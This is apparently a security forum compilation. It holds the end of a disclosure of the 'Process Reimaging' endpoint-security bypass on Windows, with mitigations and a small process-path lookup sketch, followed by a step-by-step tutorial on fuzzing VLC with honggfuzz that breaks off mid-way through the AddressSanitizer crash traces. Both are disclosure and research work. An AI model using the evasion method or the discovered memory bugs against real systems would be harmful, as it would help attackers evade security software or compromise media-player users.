- Trust verification of a remote process – any product using the APIs to verify trust of a calling process. The CVSS score will be higher than 5.0; scoring is specific to the Endpoint Security Solution architecture.

A sketch of this vulnerable lookup pattern follows below.

Protection Recommendations

McAfee Advanced Threat Research submitted the Process Reimaging technique to Microsoft on June 5th, 2018. Microsoft released a partial mitigation to Defender in the June 2019 cumulative update, for the Process Reimaging FILE_OBJECT filename changes attack vector only. This update was only for Windows 10 and does not address the vulnerable APIs in Table 1 at the OS level; therefore, ESSs are still vulnerable to Process Reimaging. Defender also remains vulnerable to the FILE_OBJECT filepath changes attack vector executed in the bypass demo video, and this attack vector affects all Windows OS versions.

New and existing process manipulation techniques which abuse legitimate Operating System features for defense evasion are difficult to prevent dynamically by monitoring specific API calls, as doing so can lead to false positives such as preventing legitimate processes from executing. A process which has been manipulated by Process Reimaging will be trusted by the ESS unless it has been traced by EDR or a memory scan which may provide deeper insight.
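As a hypothetical illustration of the lookup such products perform (and which Process Reimaging poisons), here is a small Python/ctypes sketch that resolves a PID to the image path Windows reports for it; the PID and buffer size are placeholders, and this is only meant to show the vulnerable pattern, not any vendor's actual implementation.

import ctypes
from ctypes import wintypes

kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

kernel32.OpenProcess.argtypes = (wintypes.DWORD, wintypes.BOOL, wintypes.DWORD)
kernel32.OpenProcess.restype = wintypes.HANDLE
kernel32.K32GetProcessImageFileNameW.argtypes = (
    wintypes.HANDLE, wintypes.LPWSTR, wintypes.DWORD)

def image_path_for_pid(pid: int) -> str:
    # Return the NT device-form image path that Windows reports for this PID.
    # A product that scans or trusts this file is relying on exactly the
    # information a reimaged process falsifies.
    handle = kernel32.OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, False, pid)
    if not handle:
        raise ctypes.WinError(ctypes.get_last_error())
    try:
        buf = ctypes.create_unicode_buffer(260)
        kernel32.K32GetProcessImageFileNameW(handle, buf, len(buf))
        return buf.value
    finally:
        kernel32.CloseHandle(handle)

print(image_path_for_pid(1234))  # placeholder PID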
Mitigations recommended to Microsoft

File System Synchronization (EPROCESS structures out of sync with the filesystem or File Control Block (FCB) structure)

- Allow the EPROCESS structure fields to reflect filepath changes, as is currently implemented for the filename in the VADs and the EPROCESS ImageFilePointer field. There are other EPROCESS fields which do not reflect changes to filenames and need to be updated, as K32GetModuleFileNameEx is on Windows 10 through the ImageFilePointer.

API Usage (most APIs return file information from process creation time)

- Defender (MpEngine.dll) currently uses K32GetProcessImageFileName to get the process image filename and path when it should be using K32GetModuleFileNameEx.
- Consolidate the duplicate APIs being exposed from NtQueryInformationProcess to provide easier management and guidance to consumers that require retrieving process filename information. For example, clearly state that GetMappedFileName should only be used for DLLs and not for the EXE backing a process.
- Differentiate in the API description whether the API is limited to retrieving the filename and path at process creation time or retrieves them in real time at the time of the request.

Filepath Locking

- Lock the filepath and name while a process is executing, similar to how file modification is locked, to prevent modification. At a minimum, a standard user should not be able to rename the binary path of an associated executing process.

Reuse of existing FILE_OBJECT with LoadLibrary API (Prevent Process Reimaging)

- LoadLibrary should verify that any existing FILE_OBJECT it reuses has the most up-to-date filepath at load time.
- A short-term mitigation is that Defender should at least flag that it found malicious process activity but couldn't find the associated malicious file on disk (right now it fails open, providing no notification as to any potential threats found in memory or on disk).

Mitigation recommended to Endpoint Security Vendors

The FILE_OBJECT ID must be tracked from FileCreate, as the process closes its handle for the filename by the time the image is loaded at ImageLoad. This ID must be managed by the Endpoint Security Vendor so that it can be leveraged to determine if a process has been reimaged when performing process attribute verification.

Sursa: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/in-ntdll-i-trust-process-reimaging-and-endpoint-security-solution-bypass/
15. Introduction

I spent three months working on VLC using honggfuzz, tweaking it to suit the target. In the process, I found five vulnerabilities, one of which was a high-risk double-free issue and merited CVE-2019-12874. Here's the VLC advisory: https://www.videolan.org/security/sa1901.html. Here's how I found it. I hope you find the how-to useful and that it inspires you to get fuzzing.

Background

VLC

VLC is a free, open-source, portable, cross-platform media player and streaming media server developed by the VideoLAN project. Media players such as VLC usually have a very complex codebase, including parsing and support for a large number of media file formats, math calculations, codecs, demuxers, text renderers and other complex code.

Figure 1: Loaded modules within the VLC binary.

honggfuzz

For this project I used honggfuzz, a modern, feedback-driven fuzzer based on code coverage, developed by Robert Swiecki. Why honggfuzz? It provides an easy way to instrument a target (unfortunately it did not work for this target, but we will see how I was able to overcome those issues), it has some very powerful options such as limiting the maximum input size (using the -F parameter), it has an easy to use command line, and it uses AddressSanitizer instrumentation for software coverage, saving all the unique crashes as well as the coverage files which hit new code blocks. It would be very difficult to discover those bugs without using code coverage, as given the complexity of the code, I would probably never be able to hit those paths!

Getting VLC and building it

VLC depends on many libraries and external projects. On an Ubuntu system, this is easily solved by just getting all the dependencies via apt:

$ apt-get build-dep vlc

(If you're on Ubuntu make sure to also install the libxcb-xkb-dev package.)

Now I'll grab the source code – remember you want to be running the very latest version! While you're there, let's run bootstrap which will generate the makefiles for our platform.

$ git clone https://github.com/videolan/vlc
$ ./bootstrap

Once that's done, I also want to add support for AddressSanitizer. Unfortunately, passing --with-sanitizer=address when issuing the configure command is not enough, as it will give errors just before compilation finishes due to missing compilation flags. As such, I need to revert the following commit so I can compile VLC successfully and add AddressSanitizer instrumentation.

$ git revert e85682585ab27a3c0593c403b892190c52009960

Getting samples

First things first, I need to start by getting decent samples. As luck would have it, the FFmpeg test suite already has a massive set of decent samples (that may or may not crash FFmpeg) which will help me get started. For this iteration I tried to fuzz the .mkv format, so the following command quickly gave decent initial seed files:

$ wget -r https://samples.ffmpeg.org/ -A mkv

Figure 2: Getting samples with wget.

Once there are a decent number of samples, the next step is to limit ourselves to relatively small samples only, such as those under 5MB:

$ find . -name "*.mkv" -type f -size -5M -exec mv -f {} ~/Desktop/mkv_samples/ \;

Code Coverage (using GCC)

Once we have our samples, we need to verify whether our initial seed does indeed give us decent coverage – the more code lines/blocks we hit, the better chance we have of finding a bug. Let's compile VLC using GCC's coverage flags:

$ CC=gcc CXX=g++ ./configure --enable-debug --enable-coverage
$ make -j8

Once compilation is successful, we can confirm that we have the gcno files:

$ find . -name *.gcno

At this phase, we are ready to run our seed files one by one and get some nice graphs. Depending on the samples' length, we need to figure out a way to play each one for a few seconds and then exit VLC cleanly, otherwise we're going to be here all night! Luckily, VLC already has the following two parameters: --play-and-exit and --run-time=n (where n is a number of seconds). Let's quickly navigate back to our samples folder and run this little bash script:

#!/bin/bash
FILES=/home/symeon/Desktop/vlc_samples-master/honggfuzz_coverage/*.mkv
for f in $FILES
do
  echo "[*] Processing $f file..."
  ASAN_OPTIONS=detect_leaks=0 timeout 5 ./vlc-static --play-and-exit --run-time=5 "$f"
done

Once executed, you should see VLC playing each video for 5 seconds, exiting and then looping over the videos one by one. Continuing, we are going to use @ea_foundation's little covnavi tool, which gets all the coverage information and does all the heavy lifting for you.

Figure 3: Generating coverage using gcov.

Notice that a new folder, web, has been created; if you open index.html with your favourite browser, navigate to demux/mkv and take a look at the initial coverage. With our basic sample set, we managed to hit 45.1% of lines and 33.9% of functions!

Figure 4: Initial coverage after running the initial seed files.

Excellent, we can confirm that we have a decent amount of coverage and we are ready to move on to fuzzing!

The harness

While searching the documentation, it turns out that VLC provides sample API code which can be used to play a media file for a few seconds and then shut down the player. That's exactly what we are looking for! They have also provided an extensive list with all the modules, which can be found here.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <vlc/vlc.h>

int main(int argc, char* argv[])
{
    libvlc_instance_t * inst;
    libvlc_media_player_t *mp;
    libvlc_media_t *m;

    if(argc < 2)
    {
        printf("usage: %s <input>\n", argv[0]);
        return 0;
    }

    /* Load the VLC engine */
    inst = libvlc_new (0, NULL);

    /* Create a new item */
    m = libvlc_media_new_path (inst, argv[1]);

    /* Create a media player playing environment */
    mp = libvlc_media_player_new_from_media (m);

    /* No need to keep the media now */
    libvlc_media_release (m);

    /* play the media_player */
    libvlc_media_player_play (mp);

    sleep (2); /* Let it play a bit */

    /* Stop playing */
    libvlc_media_player_stop (mp);

    /* Free the media_player */
    libvlc_media_player_release (mp);

    libvlc_release (inst);

    return 0;
}

In order to compile the above harness, we need to link against our freshly compiled library. Navigate to /etc/ld.so.conf.d, create a new file libvlc.conf and include the path of libvlc:

/home/symeon/vlc-coverage/lib/.libs

Make sure to execute ldconfig to update the linker cache. Now let's compile the harness using our fresh libraries and link it against ASAN.

hfuzz-clang harness.c -I/home/symeon/Desktop/vlc/include -L/home/symeon/Desktop/vlc/lib/.libs -o harness -lasan -lvlc

After compiling our harness and executing it, unfortunately this would lead to the following crash, making it impossible to use it for our fuzzing purposes:

Figure 5: VLC harness crashing on config_getPsz function.

Interestingly enough, by installing the libvlc-dev library (from the Ubuntu repository) and linking against this library, the harness would execute successfully; however this is not that useful for us, as we would not have any coverage at all.

For our next step, let's try to instrument the whole VLC binary using clang!
Instrumenting VLC with honggfuzz (clang coverage) Since our previous method did not quite work, let’s try to compile VLC and use honggfuzz’s instrumentation. For this one, I will be using the latest clang as well the compiler-rt runtime libraries which adds support for code coverage. $:~/vlc-coverage/bin$ clang --version clang version 9.0.0 (https://github.com/llvm/llvm-project.git 281a5beefa81d1e5390516e831c6a08d69749791) Target: x86_64-unknown-linux-gnu Thread model: posix InstalledDir: /home/symeon/Desktop/llvm-project/build/bin Following honggfuzz’s feedback-driven instructions we need to run the following commands and will enable AddressSanitizer as well: $ export CC=/home/symeon/Desktop/honggfuzz/hfuzz_cc/hfuzz-clang $ export CXX=/home/symeon/Desktop/honggfuzz/hfuzz_cc/hfuzz-clang++ $ ./configure --enable-debug --with-sanitizer=address Once the configuration succeeds, now let’s try to compile it: $ make -j4 After a while however, compilation fails: <scratch space>:231:1: note: expanded from here VLC_COMPILER ^ ../config.h:785:34: note: expanded from macro 'VLC_COMPILER' #define VLC_COMPILER " "/usr/bin/ld" -z relro --hash-style=gnu --eh-frame-hdr -m elf_x86_64 -dynamic-linker /lib64/ld-linux-x86-64.so.2 -o a.o... ^ 3 errors generated. make[3]: *** [Makefile:3166: version.lo] Error 1 make[3]: *** Waiting for unfinished jobs.... make[3]: Leaving directory '/home/symeon/vlc-cov/covnavi/vlc/src' make[2]: *** [Makefile:2160: all] Error 2 make[2]: Leaving directory '/home/symeon/vlc-cov/covnavi/vlc/src' make[1]: *** [Makefile:1567: all-recursive] Error 1 make[1]: Leaving directory '/home/symeon/vlc-cov/covnavi/vlc' make: *** [Makefile:1452: all] Error 2 Looking at the config.log, we can see the following: #define VLC_COMPILE_BY "symeon" #define VLC_COMPILE_HOST "ubuntu" #define VLC_COMPILER " "/usr/bin/ld" -z relro --hash-style=gnu --eh-frame-hdr -m elf_x86_64 -dynamic-linker /lib64/ld-linux-x86-64.so.2 -o a.out /usr/lib/gcc/x86_64-linux-gnu/8/../../../x86_64-linux-gnu/crt1.o /usr/lib/gcc/x86_64-linux-gnu/8/../../../x86_64-linux-gnu/crti.o /usr/lib/gcc/x86_64-linux-gnu/8/crtbegin.o -L/usr/lib/gcc/x86_64-linux-gnu/8 -L/usr/lib/gcc/x86_64-linux-gnu/8/../../../x86_64-linux-gnu -L/lib/x86_64-linux-gnu -L/lib/../lib64 -L/usr/lib/x86_64-linux-gnu -L/usr/lib/gcc/x86_64-linux-gnu/8/../../.. 
-L/home/symeon/Desktop/llvm-project/build/bin/../lib -L/lib -L/usr/lib --whole-archive /home/symeon/Desktop/llvm-project/build/lib/clang/9.0.0/lib/linux/libclang_rt.ubsan_standalone-x86_64.a --no-whole-archive --dynamic-list=/home/symeon/Desktop/llvm-project/build/lib/clang/9.0.0/lib/linux/libclang_rt.ubsan_standalone-x86_64.a.syms --wrap=strcmp --wrap=strcasecmp --wrap=strncmp --wrap=strncasecmp --wrap=strstr --wrap=strcasestr --wrap=memcmp --wrap=bcmp --wrap=memmem --wrap=strcpy --wrap=ap_cstr_casecmp --wrap=ap_cstr_casecmpn --wrap=ap_strcasestr --wrap=apr_cstr_casecmp --wrap=apr_cstr_casecmpn --wrap=CRYPTO_memcmp --wrap=OPENSSL_memcmp --wrap=OPENSSL_strcasecmp --wrap=OPENSSL_strncasecmp --wrap=memcmpct --wrap=xmlStrncmp --wrap=xmlStrcmp --wrap=xmlStrEqual --wrap=xmlStrcasecmp --wrap=xmlStrncasecmp --wrap=xmlStrstr --wrap=xmlStrcasestr --wrap=memcmp_const_time --wrap=strcsequal -u HonggfuzzNetDriver_main -u LIBHFUZZ_module_instrument -u LIBHFUZZ_module_memorycmp /tmp/libhfnetdriver.1000.419f7f6c4058b450.a /tmp/libhfuzz.1000.746a32a18d2c8f8a.a /tmp/libhfnetdriver.1000.419f7f6c4058b450.a --no-as-needed -lpthread -lrt -lm -ldl -lgcc --as-needed -lgcc_s --no-as-needed -lpthread -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/x86_64-linux-gnu/8/crtend.o /usr/lib/gcc/x86_64-linux-gnu/8/../../../x86_64-linux-gnu/crtn.o" Apparently, something breaks the VLC_COMPILER variable and thus instrumentation fails. Let’s not give up, and proceed with the compilation using the following command: $ make clean $ CC=clang CXX=clang++ CFLAGS="-fsanitize-coverage=trace-pc-guard,indirect-calls,trace-cmp" CXXFLAGS="-fsanitize-coverage=trace-pc-guard,indirect-calls,trace-cmp" ./configure --enable-debug --with-sanitizer=address $ ASAN_OPTIONS=detect_leaks=0 make -j8 will give us the following output: GEN ../modules/plugins.dat make[2]: Leaving directory '/home/symeon/vlc-cov/covnavi/vlc/bin' Making all in test make[2]: Entering directory '/home/symeon/vlc-cov/covnavi/vlc/test' make[2]: Nothing to be done for 'all'. make[2]: Leaving directory '/home/symeon/vlc-cov/covnavi/vlc/test' make[2]: Entering directory '/home/symeon/vlc-cov/covnavi/vlc' GEN cvlc GEN rvlc GEN nvlc GEN vlc make[2]: Leaving directory '/home/symeon/vlc-cov/covnavi/vlc' make[1]: Leaving directory '/home/symeon/vlc-cov/covnavi/vlc' Now although the compilation is successful, the binaries are missing honggfuzz’s instrumentation. As such, we need to remove the existing vlc_static binary, and manually link it with libhfuzz library. To do that, we need to figure out where linkage of the binary occurs. Let’s remove the vlc-static binary: $ cd bin $ rm vlc-static And run strace while compiling/linking the vlc-binary: $ ASAN_OPTIONS=detect_leaks=0 strace -s 1024 -f -o compilation_flags.log make CCLD vlc-static GEN ../modules/plugins.dat The above command, will specify the maximum string size to 1024 characters (default is 32), and will save all the output to specified file. Opening the log file and looking for “-o vlc-static” gives us the following result: -- snip -- 103391 <... 
wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 103392 103391 rt_sigprocmask(SIG_BLOCK, [HUP INT QUIT TERM XCPU XFSZ], NULL, 8) = 0 103391 vfork( <unfinished ...> 103393 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 103393 prlimit64(0, RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}, NULL) = 0 103393 execve("/bin/bash", ["/bin/bash", "-c", "echo \" CCLD \" vlc-static;../doltlibtool --silent --tag=CC --mode=link clang - DTOP_BUILDDIR=\\\"$(cd \"..\"; pwd)\\\" -DTOP_SRCDIR=\\\"$(cd \"..\"; pwd)\\\" -fsanitize-coverage=trace-pc-guard,indirect-calls,trace-cmp -Werror=unknown-warning-option -Werror=invalid-command-line-argument -pthread -Wall -Wextra -Wsign-compare -Wundef -Wpointer-arith -Wvolatile-register-var -Wformat -Wformat-security -Wbad-function-cast -Wwrite-strings -Wmissing-prototypes -Werror-implicit-function-declaration -Winit-self -pipe -fvisibility=hidden -fsanitize=address -g -fsanitize-address-use-after-scope -fno-omit-frame-pointer -fno-math-errno -funsafe-math-optimizations -funroll-loops -fstack-protector-strong -no-install -static -fsanitize=address -o vlc-static vlc_static-vlc.o vlc_static-override.o ../lib/libvlc.la "], 0x5565fb56ae10 /* 59 vars */ <unfinished ...> 103391 <... vfork resumed> ) = 103393 103391 rt_sigprocmask(SIG_UNBLOCK, [HUP INT QUIT TERM XCPU XFSZ], NULL, 8) = 0 103391 wait4(-1, <unfinished ...> 103393 <... execve resumed> ) = 0 103393 brk(NULL) = 0x557581212000 Bingo! We managed to find the compilation flags and libraries that vlc-static requires. The final step is to link against libhfuzz.a’s library by issuing the following command: $ ~/vlc-coverage/bin$ ../doltlibtool --tag=CC --mode=link clang -DTOP_BUILDDIR="/home/symeon/vlc-coverage" -DTOP_SRCDIR="/home/symeon/vlc-coverage" -fsanitize-coverage=trace-pc-guard,trace-cmp -Werror=unknown-warning-option -Werror=invalid-command-line-argument -pthread -Wall -Wextra -Wsign-compare -Wundef -Wpointer-arith -Wvolatile-register-var -Wformat -Wformat-security -Wbad-function-cast -Wwrite-strings -Wmissing-prototypes -Werror-implicit-function-declaration -Winit-self -pipe -fvisibility=hidden -fsanitize=address -g -fsanitize-address-use-after-scope -fno-omit-frame-pointer -fno-math-errno -funsafe-math-optimizations -funroll-loops -fstack-protector-strong -no-install -static -o vlc-static vlc_static-vlc.o vlc_static-override.o ../lib/libvlc.la -Wl,--whole-archive -L/home/symeon/Desktop/honggfuzz/libhfuzz/ -lhfuzz -u,LIBHFUZZ_module_instrument -u,LIBHFUZZ_module_memorycmp -Wl,--no-whole-archive As a last step, let’s confirm that the vlc_static binary includes libhfuzz’s symbols: $ ~/vlc-coverage/bin$ nm vlc-static | grep LIBHFUZZ Figure 6: Examining the symbols and linkage of Libhfuzz.a library. Fuzzing it! For this part, we will be using one VM with 100GB RAM and 8 cores! Figure 7: Monster VM ready to fuzz VLC. With the instrumented binary, let’s copy it over to our ramdisk (/run/shm), copy over the samples and start fuzzing it! $ cp ./vlc-static /run/shm $ cp -r ./mkv_samples /run/shm Now fire it up as below, -f is the folder with our samples, and -F will limit to maximum 16kB. $ honggfuzz -f mkv_samples -t 5 -F 16536 -- ./vlc-static --play-and-exit --run-time=4 ___FILE___ If everything succeeds, you should be getting massive coverage for both edge and pc similar to the screenshot below: Figure 8: Honggfuzz fuzzing the instrumented binary and getting coverage information. 
Hopefully within a few hours you should get your first crash, which can be found in the same directory where honggfuzz was executed (unless modified), along with a text file, HONGGFUZZ.REPORT.TXT, containing information such as the honggfuzz arguments, the date of the crash and the faulting instruction, as well as the stack trace.

Figure 9: honggfuzz displaying information regarding the crash.

Crash results/triaging

After three days of fuzzing, honggfuzz discovered a few interesting crashes such as SIGSEGV, SIGABRT, and SIGFPE. Despite the name SIGABRT, running the crashers under AddressSanitizer (we have already instrumented VLC) revealed that these bugs were in fact mostly heap-based out-of-bounds read vulnerabilities. We can simply loop through the crashers with the previously instrumented binary using this simple bash script:

$ cat asan_triage.sh
#!/bin/bash
FILES=/home/symeon/Desktop/crashers/*
OUTPUT=asan.txt
for f in $FILES
do
  echo "[*] Processing $f file..." >> $OUTPUT 2>&1
  ASAN_OPTIONS=detect_leaks=0,verbosity=1 timeout 12 ./vlc-static --play-and-exit --run-time=10 "$f" >>$OUTPUT 2>&1
done

Figure 10: Quickly triaging the crashes honggfuzz found.

Once you run it, you shouldn't see any output, since we are redirecting all the output/errors to the file asan.txt. Quickly opening this file reveals the root cause of each crash, as well as symbolised stack traces where the crash occurred.

$ cat asan.txt | grep AddressSanitizer -A 5
==59237==ERROR: AddressSanitizer: attempting free on address which was not malloc()-ed: 0x02d000000000 in thread T5
    #0 0x4ac420 in __interceptor_free /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cc:123:3
    #1 0x7f674f0e8610 in es_format_Clean /home/symeon/Desktop/vlc/src/misc/es_format.c:496:9
    #2 0x7f672fde9dac in mkv::mkv_track_t::~mkv_track_t() /home/symeon/Desktop/vlc/modules/demux/mkv/mkv.cpp:892:5
    #3 0x7f672fc3f494 in std::default_delete<mkv::mkv_track_t>::operator()(mkv::mkv_track_t*) const /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/unique_ptr.h:81:2
    #4 0x7f672fc3f2d0 in std::unique_ptr<mkv::mkv_track_t, std::default_delete<mkv::mkv_track_t> >::~unique_ptr() /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/unique_ptr.h:274:4
--
SUMMARY: AddressSanitizer: bad-free /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cc:123:3 in __interceptor_free
Thread T5 created by T4 here:
    #0 0x444dd0 in __interceptor_pthread_create /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_interceptors.cc:209:3
    #1 0x7f674f15b6a1 in vlc_clone_attr /home/symeon/Desktop/vlc/src/posix/thread.c:421:11
    #2 0x7f674f15b0ca in vlc_clone /home/symeon/Desktop/vlc/src/posix/thread.c:433:12
    #3 0x7f674ef6e141 in input_Start /home/symeon/Desktop/vlc/src/input/input.c:200:25
--
==59286==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000041fa0 at pc 0x7fabef0d00a7 bp 0x7fabf7074bd0 sp 0x7fabf7074bc8
READ of size 8 at 0x602000041fa0 thread T5
    #0 0x7fabef0d00a6 in mkv::demux_sys_t::FreeUnused() /home/symeon/Desktop/vlc/modules/demux/mkv/demux.cpp:267:34
    #1 0x7fabef186e6e in mkv::Open(vlc_object_t*) /home/symeon/Desktop/vlc/modules/demux/mkv/mkv.cpp:257:12
    #2 0x7fac0e2b01b4 in demux_Probe /home/symeon/Desktop/vlc/src/input/demux.c:180:15
    #3 0x7fac0e1f82b7 in module_load /home/symeon/Desktop/vlc/src/modules/modules.c:122:15
--
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/symeon/Desktop/vlc/modules/demux/mkv/demux.cpp:267:34 in mkv::demux_sys_t::FreeUnused()
Shadow bytes around the buggy address:
0x0c04800003a0:
fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x0c04800003b0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x0c04800003c0: fa fa fd fd fa fa 00 02 fa fa fd fd fa fa fd fd 0x0c04800003d0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa 00 00 -- ==59343==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6250016a7a4f at pc 0x0000004ab6da bp 0x7f75e5457b10 sp 0x7f75e54572c0 READ of size 128 at 0x6250016a7a4f thread T15 #0 0x4ab6d9 in __asan_memcpy /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:22:3 #1 0x7f75ece563c2 in lavc_CopyPicture /home/symeon/Desktop/vlc/modules/codec/avcodec/video.c:435:13 #2 0x7f75ece52ac3 in DecodeBlock /home/symeon/Desktop/vlc/modules/codec/avcodec/video.c:1257:17 #3 0x7f75ece4d587 in DecodeVideo /home/symeon/Desktop/vlc/modules/codec/avcodec/video.c:1354:12 -- SUMMARY: AddressSanitizer: heap-buffer-overflow /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:22:3 in __asan_memcpy Shadow bytes around the buggy address: 0x0c4a802ccef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a802ccf00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a802ccf10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a802ccf20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 -- ==59411==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6040000716b4 at pc 0x0000004ab6da bp 0x7f97b4ea8290 sp 0x7f97b4ea7a40 READ of size 13104 at 0x6040000716b4 thread T5 #0 0x4ab6d9 in __asan_memcpy /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:22:3 #1 0x7f97aceb2858 in mkv::matroska_segment_c::TrackInit(mkv::mkv_track_t*)::TrackCodecHandlers::StringProcessor_1783_handler(char const*&, mkv::matroska_segment_c::TrackInit(mkv::mkv_track_t*)::HandlerPayload&) /home/symeon/Desktop/vlc/modules/demux/mkv/matroska_segment_parse.cpp:1807:25 #2 0x7f97aceb1e7b in mkv::matroska_segment_c::TrackInit(mkv::mkv_track_t*)::TrackCodecHandlers::StringProcessor_1783_callback(char const*, void*) /home/symeon/Desktop/vlc/modules/demux/mkv/matroska_segment_parse.cpp:1783:9 #3 0x7f97ace4ed16 in (anonymous namespace)::StringDispatcher::send(char const* const&, void* const&) const /home/symeon/Desktop/vlc/modules/demux/mkv/string_dispatcher.hpp:128:13 -- SUMMARY: AddressSanitizer: heap-buffer-overflow /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:22:3 in __asan_memcpy Shadow bytes around the buggy address: 0x0c0880006280: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd 0x0c0880006290: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd 0x0c08800062a0: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 02 0x0c08800062b0: fa fa 00 00 00 00 04 fa fa fa 00 00 00 00 00 04 Fantastic! We have our PoCs, along with decent symbolised traces revealing the lines where the crash occurred! Reviewing/Increasing coverage Honggfuzz by default will save all the new samples that produce new coverage to the same folder with our samples (can be modified via the –covdir_all parameter). This is where things get interesting. Although we manged to discover a few vulnerabilities in our initial fuzzing, it’s time to run all the produced coverage again, and see which comparisons honggfuzz could not find (a.k.a magic values, maybe crc checksums or string comparisons). For this example, I will be re-running again the previously bash script, feeding all the *.cov file set. Figure 11: A total of 86254 files were saved during three days of fuzzing. 
As you can see above, a total of 86254 files were saved as they produced new paths. Now it's time to iterate over those files again:

Figure 12: Iterating over the .cov files honggfuzz produced to measure new coverage.

Let's re-run the coverage and see how much code we hit!

Figure 13: Our improved coverage after iterating over the cov files honggfuzz produced.

So after three days of fuzzing, we slightly bumped our overall coverage from 45.1% to 50%! Notice how Ebml_parser.cpp increased from the initial 71.5% to 96.8%; in fact, we were able to find some bugs in the EBML parsing functionality while fuzzing .mkv files!

What would be our next steps? How can we improve our coverage? After manually reviewing the coverage, it turns out functions such as void matroska_segment_c::ParseAttachments( KaxAttachments *attachments ) were never hit!

Figure 14: Coverage showing no execution of the ParseAttachments code base.

After a bit of research, it turns out that a tool named mkvpropedit can be used to add attachments to our sample files. Let's try that:

$ mkvpropedit SampleVideo_720x480_5mb.mkv --add-attachment '/home/symeon/Pictures/Screenshot from 2019-03-24 11-47-04.png'

Figure 15: Adding attachments to an existing mkv file.

Brilliant, this looks like it worked! Finally, let's confirm it by setting a breakpoint on the relevant code and running VLC with the new sample:

Figure 16: Hitting our breakpoint and expanding our coverage!

Excellent! We've managed to successfully create a new attachment and hit new functions within the mkv::matroska_segment codebase! Our next step would be to repeat this approach: adjust the samples and fuzz our target afresh!

Discovered vulnerabilities

After running our fuzzing project for two weeks, as you can see from the following screenshot, we performed a total of 1 million executions (!), resulting in 1547 crashes of which 36 were unique.

Figure 17: 36 unique crashes after fuzzing VLC for 15 days!

Figure 18: A double free vulnerability while parsing a malformed mkv file.

Many crashes were divisions by zero and null pointer dereferences. A few heap-based out-of-bounds writes were also discovered which we were not able to reproduce reliably. However, the following five vulnerabilities were disclosed to the security team of VLC.

1. Double Free in mkv::mkv_track_t::~mkv_track_t()

==79009==ERROR: AddressSanitizer: attempting double-free on 0x602000048e50 in thread T5:
mkv demux error: Couldn't allocate buffer to inflate data, ignore track 4
[000061100006a080] mkv demux error: Couldn't handle the track 4 compression
    #0 0x4ac420 in __interceptor_free /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cc:123:3
    #1 0x7fb7722c3b6f in mkv::mkv_track_t::~mkv_track_t() /home/symeon/Desktop/vlc/modules/demux/mkv/mkv.cpp:895:5
    #2 0x7fb77214ad4b in mkv::matroska_segment_c::ParseTrackEntry(libmatroska::KaxTrackEntry const*) /home/symeon/Desktop/vlc/modules/demux/mkv/matroska_segment_parse.cpp:992:13

The above vulnerability was fixed with the release of VLC 3.0.7, based on the following commit: http://git.videolan.org/?p=vlc.git;a=commit;h=81023659c7de5ac2637b4a879195efef50846102.

2. Freeing on address which was not malloced in es_format_Clean.

[000061100005ff40] mkv demux error: cannot load some cues/chapters/tags etc.
(broken seekhead or file) [000061100005ff40] ================================================================= ==92463==ERROR: AddressSanitizer: attempting free on address which was not malloc()-ed: 0x02d000000000 in thread T5 mkv demux error: cannot use the segment #0 0x4ac420 in __interceptor_free /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cc:123:3 #1 0x7f7470232230 in es_format_Clean /home/symeon/Desktop/vlc/src/misc/es_format.c:496:9 #2 0x7f7452f82a6c in mkv::mkv_track_t::~mkv_track_t() /home/symeon/Desktop/vlc/modules/demux/mkv/mkv.cpp:892:5 #3 0x7f7452dd78e4 in std::default_delete<mkv::mkv_track_t>::operator()(mkv::mkv_track_t*) const /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/unique_ptr.h:81:2 3. Heap Out Of Bounds Read in mkv::demux_sys_t::FreeUnused() libva error: va_getDriverName() failed with unknown libva error,driver_name=(null) [00006060001d1860] decdev_vaapi_drm generic error: vaInitialize: unknown libva error [h264 @ 0x6190000a4680] top block unavailable for requested intra mode -1 [h264 @ 0x6190000a4680] error while decoding MB 10 0, bytestream 71 ================================================================= ==104180==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62500082c24f at pc 0x0000004ab6da bp 0x7f6f5ac3faf0 sp 0x7f6f5ac3f2a0 READ of size 128 at 0x62500082c24f thread T8 #0 0x4ab6d9 in __asan_memcpy /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:22:3 #1 0x7f6f5ad1748f in lavc_CopyPicture 